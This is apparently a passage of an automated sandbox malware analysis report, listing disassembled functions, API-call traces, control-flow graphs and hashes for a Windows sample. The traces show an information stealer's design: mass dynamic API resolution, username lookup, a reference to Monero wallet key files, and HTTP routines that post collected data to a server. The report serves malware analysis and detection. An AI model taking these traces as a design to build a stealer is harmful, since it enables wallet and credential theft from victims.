opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: d7c4390663057385953a539795739bd328084e0a8456565e9e6092d7c8508d2e
                              • Instruction ID: 046a4997f4e36e6002d3186b5330965b059978b6ce17cda0b955c1d1598f0434
                              • Opcode Fuzzy Hash: d7c4390663057385953a539795739bd328084e0a8456565e9e6092d7c8508d2e
                              • Instruction Fuzzy Hash: 4D4136A47D26047EC6A9BBA4A94EFDFB7565FD2704F445060EA0A52383CBB866004736
                              Function 00794880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 794880-794942 call 7aa7a0 call 7947b0 call 7aa740 * 5 InternetOpenA StrCmpCA 816 79494b-79494f 801->816 817 794944 801->817 818 794ecb-794ef3 InternetCloseHandle call 7aaad0 call 799ac0 816->818 819 794955-794acd call 7a8b60 call 7aa920 call 7aa8a0 call 7aa800 * 2 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa920 call 7aa8a0 call 7aa800 * 2 InternetConnectA 816->819 817->816 829 794f32-794fa2 call 7a8990 * 2 call 7aa7a0 call 7aa800 * 8 818->829 830 794ef5-794f2d call 7aa820 call 7aa9b0 call 7aa8a0 call 7aa800 818->830 819->818 905 794ad3-794ad7 819->905 830->829 906 794ad9-794ae3 905->906 907 794ae5 905->907 908 794aef-794b22 HttpOpenRequestA 906->908 907->908 909 794b28-794e28 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa740 call 7aa920 * 2 call 7aa8a0 call 7aa800 * 2 call 7aaad0 lstrlen call 7aaad0 * 2 lstrlen call 7aaad0 HttpSendRequestA 908->909 910 794ebe-794ec5 InternetCloseHandle 908->910 1021 794e32-794e5c InternetReadFile 909->1021 910->818 1022 794e5e-794e65 1021->1022 1023 794e67-794eb9 InternetCloseHandle call 7aa800 1021->1023 1022->1023 1025 794e69-794ea7 call 7aa9b0 call 7aa8a0 call 7aa800 1022->1025 1023->910 1025->1021
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00794915
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 0079493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00794ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,007B0DDB,00000000,?,?,00000000,?,",00000000,?,014CEA28), ref: 00794DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00794E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00794E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00794E49
                              • InternetCloseHandle.WININET(00000000), ref: 00794EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00794EC5
                              • HttpOpenRequestA.WININET(00000000,014CE958,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00794B15
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • InternetCloseHandle.WININET(00000000), ref: 00794ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 6a58c8190860eccf87b91a8712e5e89ff3680c99ffe5e81f64b98e5b63c49e3d
                              • Instruction ID: fd95c41b765930fc990b6deb021f9dc6b6b78093a7ea93a9ec6da2240f7ee595
                              • Opcode Fuzzy Hash: 6a58c8190860eccf87b91a8712e5e89ff3680c99ffe5e81f64b98e5b63c49e3d
                              • Instruction Fuzzy Hash: B812BE71911118EADB55EB90DC9AFEEB378BF95300F5042A9B10662091EF783F49CF62
                              Function 007A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: de7b4f054ab80a2c7a2e10fe54e8952f720c316f6d4388fad43f9e0a539a8feb
                              • Instruction ID: ee79f798b713a0932ff14fc99af68745d3839a5bc99e205a6f64d29e7d54eb4a
                              • Opcode Fuzzy Hash: de7b4f054ab80a2c7a2e10fe54e8952f720c316f6d4388fad43f9e0a539a8feb
                              • Instruction Fuzzy Hash: 64F04FF1D48208ABC714DF98DD49BAEBBB8EB45711F10025AFA05A2680C7781944CBA1
                              Function 00791160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: ca844717552df7e3d4ed932bfbdcb7d9f65a9bf5e729b90b9b7af41831df8fbd
                              • Instruction ID: 43868d13301940c911387f4d9c71636f51511343feb5ee5d4fd4c225ffc696a5
                              • Opcode Fuzzy Hash: ca844717552df7e3d4ed932bfbdcb7d9f65a9bf5e729b90b9b7af41831df8fbd
                              • Instruction Fuzzy Hash: 48D05E74D4530CDBCB00DFE0D8496DDBBB8FB08312F000595D90562340EA3058E1CAA6
                              Function 007A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 7a9c10-7a9c1a 634 7a9c20-7aa031 GetProcAddress * 43 633->634 635 7aa036-7aa0ca LoadLibraryA * 8 633->635 634->635 636 7aa0cc-7aa141 GetProcAddress * 5 635->636 637 7aa146-7aa14d 635->637 636->637 638 7aa153-7aa211 GetProcAddress * 8 637->638 639 7aa216-7aa21d 637->639 638->639 640 7aa298-7aa29f 639->640 641 7aa21f-7aa293 GetProcAddress * 5 639->641 642 7aa337-7aa33e 640->642 643 7aa2a5-7aa332 GetProcAddress * 6 640->643 641->640 644 7aa41f-7aa426 642->644 645 7aa344-7aa41a GetProcAddress * 9 642->645 643->642 646 7aa428-7aa49d GetProcAddress * 5 644->646 647 7aa4a2-7aa4a9 644->647 645->644 646->647 648 7aa4ab-7aa4d7 GetProcAddress * 2 647->648 649 7aa4dc-7aa4e3 647->649 648->649 650 7aa515-7aa51c 649->650 651 7aa4e5-7aa510 GetProcAddress * 2 649->651 652 7aa612-7aa619 650->652 653 7aa522-7aa60d GetProcAddress * 10 650->653 651->650 654 7aa61b-7aa678 GetProcAddress * 4 652->654 655 7aa67d-7aa684 652->655 653->652 654->655 656 7aa69e-7aa6a5 655->656 657 7aa686-7aa699 GetProcAddress 655->657 658 7aa708-7aa709 656->658 659 7aa6a7-7aa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014B5430), ref: 007A9C2D
                              • GetProcAddress.KERNEL32(74DD0000,014B5250), ref: 007A9C45
                              • GetProcAddress.KERNEL32(74DD0000,014C9550), ref: 007A9C5E
                              • GetProcAddress.KERNEL32(74DD0000,014C9388), ref: 007A9C76
                              • GetProcAddress.KERNEL32(74DD0000,014C9268), ref: 007A9C8E
                              • GetProcAddress.KERNEL32(74DD0000,014C93D0), ref: 007A9CA7
                              • GetProcAddress.KERNEL32(74DD0000,014BB9D0), ref: 007A9CBF
                              • GetProcAddress.KERNEL32(74DD0000,014CCFA0), ref: 007A9CD7
                              • GetProcAddress.KERNEL32(74DD0000,014CCE20), ref: 007A9CF0
                              • GetProcAddress.KERNEL32(74DD0000,014CCF58), ref: 007A9D08
                              • GetProcAddress.KERNEL32(74DD0000,014CCFD0), ref: 007A9D20
                              • GetProcAddress.KERNEL32(74DD0000,014B5450), ref: 007A9D39
                              • GetProcAddress.KERNEL32(74DD0000,014B5470), ref: 007A9D51
                              • GetProcAddress.KERNEL32(74DD0000,014B54F0), ref: 007A9D69
                              • GetProcAddress.KERNEL32(74DD0000,014B5530), ref: 007A9D82
                              • GetProcAddress.KERNEL32(74DD0000,014CD048), ref: 007A9D9A
                              • GetProcAddress.KERNEL32(74DD0000,014CCDF0), ref: 007A9DB2
                              • GetProcAddress.KERNEL32(74DD0000,014BBB38), ref: 007A9DCB
                              • GetProcAddress.KERNEL32(74DD0000,014B5550), ref: 007A9DE3
                              • GetProcAddress.KERNEL32(74DD0000,014CD030), ref: 007A9DFB
                              • GetProcAddress.KERNEL32(74DD0000,014CCFB8), ref: 007A9E14
                              • GetProcAddress.KERNEL32(74DD0000,014CCE38), ref: 007A9E2C
                              • GetProcAddress.KERNEL32(74DD0000,014CD018), ref: 007A9E44
                              • GetProcAddress.KERNEL32(74DD0000,014B5590), ref: 007A9E5D
                              • GetProcAddress.KERNEL32(74DD0000,014CCE50), ref: 007A9E75
                              • GetProcAddress.KERNEL32(74DD0000,014CCE08), ref: 007A9E8D
                              • GetProcAddress.KERNEL32(74DD0000,014CCFE8), ref: 007A9EA6
                              • GetProcAddress.KERNEL32(74DD0000,014CD078), ref: 007A9EBE
                              • GetProcAddress.KERNEL32(74DD0000,014CCF70), ref: 007A9ED6
                              • GetProcAddress.KERNEL32(74DD0000,014CD060), ref: 007A9EEF
                              • GetProcAddress.KERNEL32(74DD0000,014CD000), ref: 007A9F07
                              • GetProcAddress.KERNEL32(74DD0000,014CCEE0), ref: 007A9F1F
                              • GetProcAddress.KERNEL32(74DD0000,014CCE68), ref: 007A9F38
                              • GetProcAddress.KERNEL32(74DD0000,014CA940), ref: 007A9F50
                              • GetProcAddress.KERNEL32(74DD0000,014CCE80), ref: 007A9F68
                              • GetProcAddress.KERNEL32(74DD0000,014CCE98), ref: 007A9F81
                              • GetProcAddress.KERNEL32(74DD0000,014B55D0), ref: 007A9F99
                              • GetProcAddress.KERNEL32(74DD0000,014CCF28), ref: 007A9FB1
                              • GetProcAddress.KERNEL32(74DD0000,014B5270), ref: 007A9FCA
                              • GetProcAddress.KERNEL32(74DD0000,014CD090), ref: 007A9FE2
                              • GetProcAddress.KERNEL32(74DD0000,014CD0A8), ref: 007A9FFA
                              • GetProcAddress.KERNEL32(74DD0000,014B5290), ref: 007AA013
                              • GetProcAddress.KERNEL32(74DD0000,014B5670), ref: 007AA02B
                              • LoadLibraryA.KERNEL32(014CD0C0,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA03D
                              • LoadLibraryA.KERNEL32(014CCDD8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA04E
                              • LoadLibraryA.KERNEL32(014CCEF8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA060
                              • LoadLibraryA.KERNEL32(014CCEB0,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA072
                              • LoadLibraryA.KERNEL32(014CCEC8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA083
                              • LoadLibraryA.KERNEL32(014CCF40,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA095
                              • LoadLibraryA.KERNEL32(014CCF10,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA0A7
                              • LoadLibraryA.KERNEL32(014CCF88,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA0B8
                              • GetProcAddress.KERNEL32(75290000,014B5650), ref: 007AA0DA
                              • GetProcAddress.KERNEL32(75290000,014CD258), ref: 007AA0F2
                              • GetProcAddress.KERNEL32(75290000,014C8E90), ref: 007AA10A
                              • GetProcAddress.KERNEL32(75290000,014CD138), ref: 007AA123
                              • GetProcAddress.KERNEL32(75290000,014B5850), ref: 007AA13B
                              • GetProcAddress.KERNEL32(6FD40000,014BB8E0), ref: 007AA160
                              • GetProcAddress.KERNEL32(6FD40000,014B58B0), ref: 007AA179
                              • GetProcAddress.KERNEL32(6FD40000,014BBC00), ref: 007AA191
                              • GetProcAddress.KERNEL32(6FD40000,014CD180), ref: 007AA1A9
                              • GetProcAddress.KERNEL32(6FD40000,014CD2A0), ref: 007AA1C2
                              • GetProcAddress.KERNEL32(6FD40000,014B57B0), ref: 007AA1DA
                              • GetProcAddress.KERNEL32(6FD40000,014B5810), ref: 007AA1F2
                              • GetProcAddress.KERNEL32(6FD40000,014CD1B0), ref: 007AA20B
                              • GetProcAddress.KERNEL32(752C0000,014B58D0), ref: 007AA22C
                              • GetProcAddress.KERNEL32(752C0000,014B5690), ref: 007AA244
                              • GetProcAddress.KERNEL32(752C0000,014CD2D0), ref: 007AA25D
                              • GetProcAddress.KERNEL32(752C0000,014CD198), ref: 007AA275
                              • GetProcAddress.KERNEL32(752C0000,014B5630), ref: 007AA28D
                              • GetProcAddress.KERNEL32(74EC0000,014BBA20), ref: 007AA2B3
                              • GetProcAddress.KERNEL32(74EC0000,014BBC28), ref: 007AA2CB
                              • GetProcAddress.KERNEL32(74EC0000,014CD270), ref: 007AA2E3
                              • GetProcAddress.KERNEL32(74EC0000,014B56B0), ref: 007AA2FC
                              • GetProcAddress.KERNEL32(74EC0000,014B58F0), ref: 007AA314
                              • GetProcAddress.KERNEL32(74EC0000,014BB868), ref: 007AA32C
                              • GetProcAddress.KERNEL32(75BD0000,014CD210), ref: 007AA352
                              • GetProcAddress.KERNEL32(75BD0000,014B56D0), ref: 007AA36A
                              • GetProcAddress.KERNEL32(75BD0000,014C8EB0), ref: 007AA382
                              • GetProcAddress.KERNEL32(75BD0000,014CD3C0), ref: 007AA39B
                              • GetProcAddress.KERNEL32(75BD0000,014CD1F8), ref: 007AA3B3
                              • GetProcAddress.KERNEL32(75BD0000,014B5830), ref: 007AA3CB
                              • GetProcAddress.KERNEL32(75BD0000,014B5910), ref: 007AA3E4
                              • GetProcAddress.KERNEL32(75BD0000,014CD1C8), ref: 007AA3FC
                              • GetProcAddress.KERNEL32(75BD0000,014CD360), ref: 007AA414
                              • GetProcAddress.KERNEL32(75A70000,014B5890), ref: 007AA436
                              • GetProcAddress.KERNEL32(75A70000,014CD2B8), ref: 007AA44E
                              • GetProcAddress.KERNEL32(75A70000,014CD1E0), ref: 007AA466
                              • GetProcAddress.KERNEL32(75A70000,014CD330), ref: 007AA47F
                              • GetProcAddress.KERNEL32(75A70000,014CD150), ref: 007AA497
                              • GetProcAddress.KERNEL32(75450000,014B5730), ref: 007AA4B8
                              • GetProcAddress.KERNEL32(75450000,014B5770), ref: 007AA4D1
                              • GetProcAddress.KERNEL32(75DA0000,014B5930), ref: 007AA4F2
                              • GetProcAddress.KERNEL32(75DA0000,014CD288), ref: 007AA50A
                              • GetProcAddress.KERNEL32(6F070000,014B56F0), ref: 007AA530
                              • GetProcAddress.KERNEL32(6F070000,014B5790), ref: 007AA548
                              • GetProcAddress.KERNEL32(6F070000,014B5710), ref: 007AA560
                              • GetProcAddress.KERNEL32(6F070000,014CD2E8), ref: 007AA579
                              • GetProcAddress.KERNEL32(6F070000,014B5950), ref: 007AA591
                              • GetProcAddress.KERNEL32(6F070000,014B5750), ref: 007AA5A9
                              • GetProcAddress.KERNEL32(6F070000,014B57D0), ref: 007AA5C2
                              • GetProcAddress.KERNEL32(6F070000,014B57F0), ref: 007AA5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 007AA5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 007AA607
                              • GetProcAddress.KERNEL32(75AF0000,014CD0D8), ref: 007AA629
                              • GetProcAddress.KERNEL32(75AF0000,014C8EA0), ref: 007AA641
                              • GetProcAddress.KERNEL32(75AF0000,014CD228), ref: 007AA659
                              • GetProcAddress.KERNEL32(75AF0000,014CD240), ref: 007AA672
                              • GetProcAddress.KERNEL32(75D90000,014B5870), ref: 007AA693
                              • GetProcAddress.KERNEL32(6E330000,014CD120), ref: 007AA6B4
                              • GetProcAddress.KERNEL32(6E330000,014B5970), ref: 007AA6CD
                              • GetProcAddress.KERNEL32(6E330000,014CD0F0), ref: 007AA6E5
                              • GetProcAddress.KERNEL32(6E330000,014CD300), ref: 007AA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 9bed9bc36296f953c95db3b44940c174ed61dbd0e56f4b2c587f59064c7f27ab
                              • Instruction ID: a3a230f7e9704f8b23c07f1a22a3dc5750ff5ac4b0b28481a5df4dddc22845c3
                              • Opcode Fuzzy Hash: 9bed9bc36296f953c95db3b44940c174ed61dbd0e56f4b2c587f59064c7f27ab
                              • Instruction Fuzzy Hash: 11624DB5AAA241AFC744DFA8ED8895637F9F78C301304851BA609C3274D73999E1FF12
                              Function 00796280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 796280-79630b call 7aa7a0 call 7947b0 call 7aa740 InternetOpenA StrCmpCA 1040 79630d 1033->1040 1041 796314-796318 1033->1041 1040->1041 1042 796509-796525 call 7aa7a0 call 7aa800 * 2 1041->1042 1043 79631e-796342 InternetConnectA 1041->1043 1062 796528-79652d 1042->1062 1045 796348-79634c 1043->1045 1046 7964ff-796503 InternetCloseHandle 1043->1046 1048 79635a 1045->1048 1049 79634e-796358 1045->1049 1046->1042 1050 796364-796392 HttpOpenRequestA 1048->1050 1049->1050 1052 796398-79639c 1050->1052 1053 7964f5-7964f9 InternetCloseHandle 1050->1053 1055 79639e-7963bf InternetSetOptionA 1052->1055 1056 7963c5-796405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 79642c-79644b call 7a8940 1056->1058 1059 796407-796427 call 7aa740 call 7aa800 * 2 1056->1059 1067 7964c9-7964e9 call 7aa740 call 7aa800 * 2 1058->1067 1068 79644d-796454 1058->1068 1059->1062 1067->1062 1069 7964c7-7964ef InternetCloseHandle 1068->1069 1070 796456-796480 InternetReadFile 1068->1070 1069->1053 1073 79648b 1070->1073 1074 796482-796489 1070->1074 1073->1069 1074->1073 1078 79648d-7964c5 call 7aa9b0 call 7aa8a0 call 7aa800 1074->1078 1078->1070
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                              • HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007963FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0079646D
                              • InternetCloseHandle.WININET(00000000), ref: 007964EF
                              • InternetCloseHandle.WININET(00000000), ref: 007964F9
                              • InternetCloseHandle.WININET(00000000), ref: 00796503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
